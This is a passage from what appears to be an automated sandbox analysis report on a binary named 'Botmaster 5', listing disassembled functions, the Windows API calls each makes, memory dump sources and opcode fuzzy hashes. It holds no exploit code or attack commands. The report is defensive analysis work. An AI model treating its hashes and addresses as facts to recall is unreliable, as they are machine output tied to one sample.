                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                  • String ID: DINPUT.DLL$DirectInputCreateEx
                                                                                                                                                                                                                  • API String ID: 2574300362-1491551912
                                                                                                                                                                                                                  • Opcode ID: 9a970b243fdafba1845906d02edba2089e69b1e987f4613530de18cc29032451
                                                                                                                                                                                                                  • Instruction ID: 8429f7e342f3814f155beb61886f18b0f6e8266869361ae869d0456cffd9e8d1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a970b243fdafba1845906d02edba2089e69b1e987f4613530de18cc29032451
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E048357807446ADB148F74BC46B1537B8DB0470AF144036F400F21D2FBF8A890865F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004235DA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004235A7: GetParent.USER32(?), ref: 004235CA
                                                                                                                                                                                                                  • GetPropW.USER32(00000000,00000008), ref: 004235ED
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F4), ref: 004235FB
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00423607
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LongParentPropWindow_strftime
                                                                                                                                                                                                                  • String ID: PB_WindowID
                                                                                                                                                                                                                  • API String ID: 40168111-1508741625
                                                                                                                                                                                                                  • Opcode ID: 4849f720e41ae1c17b4ab6820bd57a7bae60f20c7a71f3c656c639598d4cb488
                                                                                                                                                                                                                  • Instruction ID: 4ef3ae07ceb963fd5c661899acb9a2709e2704200bfa26f0fe9f7964480f79bf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4849f720e41ae1c17b4ab6820bd57a7bae60f20c7a71f3c656c639598d4cb488
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99D0A775608311BFEA013B64EC05C3F7A2CFB54714F904915F464800F0DAF59924DB2A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042807B Relevance: 6.4, APIs: 5, Instructions: 111memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046BD94,0046BDAC,00428068,00401080,00000000,-00000008,?,?,00427AF3,-00000008,00000010,00010000,00000004,00000007), ref: 004280BF
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000018,?,?,00427AF3,-00000008,00000010,00010000,00000004,00000007,?,?,?,0041CA17), ref: 004280F7
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046BD94,?,?,00427AF3,-00000008,00000010,00010000,00000004,00000007,?,?,?,0041CA17), ref: 00428157
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000038,00401080,00000000,-00000008,?,?,00427AF3,-00000008,00000010,00010000,00000004,00000007), ref: 0042816A
                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020,?,?,00427AF3,-00000008,00000010,00010000,00000004,00000007,?,?,?,0041CA17), ref: 0042819D
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2544007295-0
                                                                                                                                                                                                                  • Opcode ID: 3335117fa592cf99764255ce2b88e52c5ecd728f03edad8820f778dfa298cf4a
                                                                                                                                                                                                                  • Instruction ID: e739ae37b100b415765db16108108a004bd59926f79f0a1ba45aee63fb96811a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3335117fa592cf99764255ce2b88e52c5ecd728f03edad8820f778dfa298cf4a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E418B717027259FC724CF18EC44A6ABBF4FB04710B55852EE446D7390EBB4D851CB99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00410143 Relevance: 6.3, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 0041022D: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000048,?,?,00410151,?), ref: 0041027E
                                                                                                                                                                                                                    • Part of subcall function 0041022D: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,00000048,?,?,00410151,?,?,?,00000048,0045DF26,004035F1,Title), ref: 0041028A
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000001,000000FF,00000000,00000000,?,?,?,00000048,0045DF26,004035F1,Title,00439010,00000000,00000000), ref: 0041017F
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,-00000001,?,?,?,00000048,0045DF26,004035F1,Title,00439010,00000000), ref: 0041019C
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 004101D8
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00410200
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041021F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$wcslen$AllocHeapwcscpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1193778521-0
                                                                                                                                                                                                                  • Opcode ID: a0b2ec7e868e05175de376957e20233629df05dcfdf6318a66afc920af68d88d
                                                                                                                                                                                                                  • Instruction ID: af9d5de2b469ae878b371fd7653775c7e60210d172568a9e52f844a3eff1c127
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b2ec7e868e05175de376957e20233629df05dcfdf6318a66afc920af68d88d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B2124321002297BDB212F619C49EFF3BA9FB45320FA00517F91157281EABD8CC1D2A8
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00429630 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(009A0000,00000000,?,00000000,?,?,?), ref: 004296FA
                                                                                                                                                                                                                  • wcsncpy.MSVCRT ref: 00429747
                                                                                                                                                                                                                  • wcsncpy.MSVCRT ref: 00429797
                                                                                                                                                                                                                  • HeapFree.KERNEL32(009A0000,00000000,?,00000000,?,?,?), ref: 004297B7
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heapwcsncpy$AllocFree
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1479455602-0
                                                                                                                                                                                                                  • Opcode ID: 5b6182db1a40d4d804370252292c6dc4cfca4e50b309fb25a82d6271daf24368
                                                                                                                                                                                                                  • Instruction ID: 8bf92d05c59c633c481f955a8e27fcee13ff732f2bedf29943aa93b9fa0b7f30
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b6182db1a40d4d804370252292c6dc4cfca4e50b309fb25a82d6271daf24368
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70510F316043219BC720DF29E840A6BB7E5EFC4744F89491EF88597354E7B8ED04C79A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041C750 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,0045DF26,00000001,?,?,00409AC7,?,?,FFFFFFFF), ref: 0041C7F6
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000000,00000000,00000000,?,?,00409AC7,?,?,FFFFFFFF,00000008,00000001), ref: 0041C80B
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0045DF26,00000001,?,?,00409AC7,?,?,FFFFFFFF), ref: 0041C81A
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00409AC7,?,?,FFFFFFFF,00000008,00000001), ref: 0041C82C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 626452242-0
                                                                                                                                                                                                                  • Opcode ID: 4a7d153614146d4fbb9f7ebfb2bbbde92e1246b76756918f30ffef3d0c5acd69
                                                                                                                                                                                                                  • Instruction ID: b3a4b05fcbfec7f67e2c16c34995a10dc46425de014e5233ba2a1e51211898aa
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a7d153614146d4fbb9f7ebfb2bbbde92e1246b76756918f30ffef3d0c5acd69
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC312B362843026AD2309A29DC81FB7B794EFD5B60F21080BF9859B3C0D7B4AC81C669
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00408E5A Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00408EA3
                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(00000000), ref: 00408F02
                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00408F14
                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?,00000000), ref: 00408FAA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ActiveBrowseFolderFreeFromListPathTaskWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3168738507-0
                                                                                                                                                                                                                  • Opcode ID: 6ebfc9c2ad4aa4f3f57af67fb7692ecd33b9d1e50581d9c6b7a48d22c1ddfd2a
                                                                                                                                                                                                                  • Instruction ID: c23722c25ce972c15713867c05353ea886fa525bfd78851a067ddfe72a558dec
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ebfc9c2ad4aa4f3f57af67fb7692ecd33b9d1e50581d9c6b7a48d22c1ddfd2a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83418CB1104306AFD700EF21E941A5F7BE9FB88328F10882FF184962A0D779DD94CB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004246A5 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000006,?,?,?,?,009A0528,00402CC8,00000001,00040073,00000000,00000001,000001C5,000000DC,0000012D,00000080), ref: 00424735
                                                                                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 004247A3
                                                                                                                                                                                                                  • CreateAcceleratorTableW.USER32(?,?,?,?,?,009A0528,00402CC8,00000001,00040073,00000000,00000001,000001C5,000000DC,0000012D,00000080,009A0528), ref: 004247AF
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AcceleratorTable$AllocCreateDestroyHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1117254962-0
                                                                                                                                                                                                                  • Opcode ID: 1c4a12393d38e80cd5fcc74f1284e8fed9e7067fa490d4caa7e0f56d8f4e0471
                                                                                                                                                                                                                  • Instruction ID: dd172285f003cbdcd92af12b77f5e0a0ba5b3a8529bc72062fc3d03301ae458d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c4a12393d38e80cd5fcc74f1284e8fed9e7067fa490d4caa7e0f56d8f4e0471
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF319030600711DBC724CF24EA45A6ABBF5FF91704F50C42EE8669B6A0E3B9EA50DB15
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041FB08 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001001,00000000,00000000), ref: 0041FB88
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041FB96
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,FFFFFFFC,?), ref: 0041FBE5
                                                                                                                                                                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000487,?,00000000,00000000,?,?,0041F98A,?,00000000,00000000,?,?,0041F5F0), ref: 0041FC20
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$DeleteLongMessageObjectRedrawSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 357883785-0
                                                                                                                                                                                                                  • Opcode ID: 9753ce68bf57bba9bc727cd7a9c341322cc175e2063cf8372a809eb6b300b923
                                                                                                                                                                                                                  • Instruction ID: 3e5d60edb27c7177db46f342e2485005add017aac3823a4feb91456dc0928725
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9753ce68bf57bba9bc727cd7a9c341322cc175e2063cf8372a809eb6b300b923
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E219131118604BBCB116F71EC42EAA7761FB08318F10453BF912D11B2E7799CD5AA6F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041F0EC Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0041F15A
                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041F1BB
                                                                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0041F1CD
                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0041F1D9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Color$CallModeProcTextWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3401553210-0
                                                                                                                                                                                                                  • Opcode ID: 7c5910790a3385d13fb6bf8654d8e9187197018fbb55793caf663a6a07b367b8
                                                                                                                                                                                                                  • Instruction ID: 54e7028dd47a585aa858d6cfc1df99f14eabf341b68ec0b53e4c972457fb7199
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5910790a3385d13fb6bf8654d8e9187197018fbb55793caf663a6a07b367b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32215132118605FBCB019F20DD419AA77A2FB08308F44043AF98596231E77D9DD6DB6B
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420715 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00420724
                                                                                                                                                                                                                    • Part of subcall function 004203E4: SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004203F3
                                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(?), ref: 00420752
                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00420771
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00420778
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
